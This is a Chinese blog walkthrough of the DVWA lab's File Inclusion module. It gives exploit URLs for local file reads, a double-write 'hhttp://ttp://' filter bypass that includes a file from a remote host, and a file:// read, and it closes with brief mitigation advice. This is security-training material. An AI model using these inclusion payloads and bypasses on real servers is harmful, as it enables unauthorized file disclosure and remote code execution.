DVWA文件包含漏洞File Inclusion

最新推荐文章于 2024-07-24 14:08:33 发布
最新推荐文章于 2024-07-24 14:08:33 发布
阅读量235 收藏 4
点赞数 3
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leaf_lucky/article/details/140601432
版权

一:什么是文件包含漏洞

文件包含(File Inclusion)是一些对文件操作的函数未经过有效过滤,运行了恶意传入的非预期的文件路径,导致敏感信息泄露或代码执行。如果文件中存在恶意代码,无论什么样的后缀类型,文件内的恶意代码都会被解析执行,这就导致了文件包含漏洞的产生。

二:文件包含漏洞通关

将等级设置为low

点击文件包含漏洞模块,可以看到URL是

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=include.php

我们先创建一个文件,命名为1.txt,将文件内容写为hello,如下图:

 

记住文件的地址,我这里的地址为:C:\1.txt,接着讲URL换成

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=C:\1.txt

可以看到页面正常访问到1.txt,说明存在文件包含漏洞

 将等级设置为medium

(1)本地包含漏洞

直接访问本地的,可以发现没有限制

(2)远程包含漏洞

利用双写绕过实现,因为会过滤http://,所以将其修改为hhttp://ttp://(红色部分是被过滤的内容)

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=hhttp://ttp://192.168.24.128/1.txt

将等级设置为high

可利用file协议进行读文件,将URL设置为

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file://C://1.txt

三:文件包含漏洞的防范

1.及时更新软件修复漏洞

2.管理权限,allow_url_include和allow_url_fopen最小权限化

leaf_lucky
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA文件包含漏洞File Inclusion
qq_54537919的博客
06-27 1144
DVWA文件包含漏洞File Inclusion
DVWA包含以下几个主要的安全漏洞类别.rar
06-13
5. **文件包含漏洞File Inclusion)**:这种漏洞允许攻击者通过修改动态文件包含函数的参数,将恶意文件内容注入到应用程序中。在DVWA中,这可能表现为可以更改被包含文件路径,从而读取服务器上的敏感文件或...
DVWA文件包含漏洞file inclusion
kirito_pio的博客
06-05 1010
文件包含漏洞是在主机要执行的文件中添加包含木马的文件。 low级别和medium级别分别有远程文件包含(RFI)和本地文件包含(LFI),high级别使用了白名单,无法绕过。 1、low级别 1.1 本地文件包含 在https://blog.csdn.net/kirito_pio/article/details/106547336中,完成了对各个级别的文件上传,但是在执行high级别时只进行了上传,不能使用菜,因为图片是静态的文件,不能自己执行,需要等待请求。 图片中包含的一句话脚本如下,可以..
DVWA学习之File Inclusion文件包含漏洞
weixin_40950781的博客
08-18 2390
DVWA学习之File InclusionFile Inclusion文件包含)0x01 何为File Inclusion?1.简介2.相关函数3.文件包含功能4.相关知识5.文件包含漏洞的一般特征6.文件包含的测试0x02 low级别0x02 medium级别0x03 high级别0x04 impossible级别0x05 文件包含漏洞的利用0x06 防御方法 File Inclusion(文...
DVWA包含漏洞file Inclusion)——文件包含漏洞产生的原因、文件包含漏洞的利用方式、DVWA包含漏洞file Inclusion
weixin_45116657的博客
09-10 2688
hahaha
DVWA靶场——File Inclusion(文件包含漏洞)
qq_74806534的博客
01-18 6453
程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含File Inclusion文件包含漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
Dvwa漏洞之 local file inclusion 本地文件包含
小雨的博客
04-10 3516
local file inclusion运行攻击者读取同一台服务器上的认可文件 访问www目录外的文件 如果用户账号密码保存在某个文件里,就可以读了,这个是很危险的 如果多个网站部署在一台服务器上,通过a网站的此漏洞,就可以访问B网站的文件,从而进一步实施攻击 ...
DVWA-文件包含File Inclusion
weixin_58954236的博客
08-19 372
文件包含:开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含文件包含漏洞:开发人员为了使代码更灵活,会将被包含文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞文件包含是利用函数来包含web目录以外的文件,分为本地包含和远程包含
DVWA —— File Inclusion 文件包含
YouTheFreedom的博客
05-22 1591
web 程序中引入一段用户能控制的脚本或代码,并让服务器端执行 include() 等函数通过动态变量的方式引入需要包含文件,用户能够控制该动态变量,实现本地文件包含或者远程文件包含
DVWA——文件包含漏洞File Inclusion
qq_45927819的博客
10-18 1211
前言: 之前总结了文件上传漏洞的三个等级的测试,到high的时候我们制作的一句话木马图片需要去解析,就会用到文件包含漏洞,那么今天就来学习一下文件包含漏洞DVWA——File Inclusion测试吧! 什么是文件包含漏洞文件包含概述 和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。 什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程就叫做
DVWA的压缩文件安装包下载
09-30
4. **文件包含漏洞**:在"File Inclusion"环节,你可以看到如何利用错误配置的文件包含功能来读取服务器上的任意文件,甚至执行服务器上的代码。了解如何正确处理文件包含函数可以防止这类攻击。 5. **认证与会话...
DVWA-master.zip
08-22
DVWA的"File Inclusion"部分,你可以学习如何检测和修复这类问题。 5. **命令注入**:当应用程序使用不受信任的输入来构建操作系统命令时,攻击者可能执行任意系统命令。"Command Injection"章节提供了一个实践...
DVWA最新版
03-23
DVWA的"File Inclusion"部分让你了解这类漏洞的危害,学习如何设置严格的文件验证规则以避免此类风险。 命令注入是指攻击者能够注入操作系统命令到应用程序,从而执行恶意操作。在"Command Injection"模块中,你将...
Web漏洞实战教程(DVWA的使用)
12-30
3.4 FILE INCLUSION 33 3.4.1 漏洞介绍 33 3.4.2 攻击实战 33 3.4.3 PHP源代码 33 3.5 SQL INJECTION 34 3.5.1 漏洞介绍 34 3.5.2 攻击实战 34 3.5.3 PHP源代码 39 3.6 SQL INJECTION(BLIND) 39 3.6.1 漏洞介绍 39 ...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 411
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 286
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1052
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
内网安全:IPC横向
8888的博客
07-23 675
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
dvwa文件包含漏洞利用
07-28
- *1* *2* *3* [DVWA包含漏洞file Inclusion)——文件包含漏洞产生的原因、文件包含漏洞的利用方式、DVWA包含漏洞...](https://blog.csdn.net/weixin_45116657/article/details/100602769)[target="_blank" ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值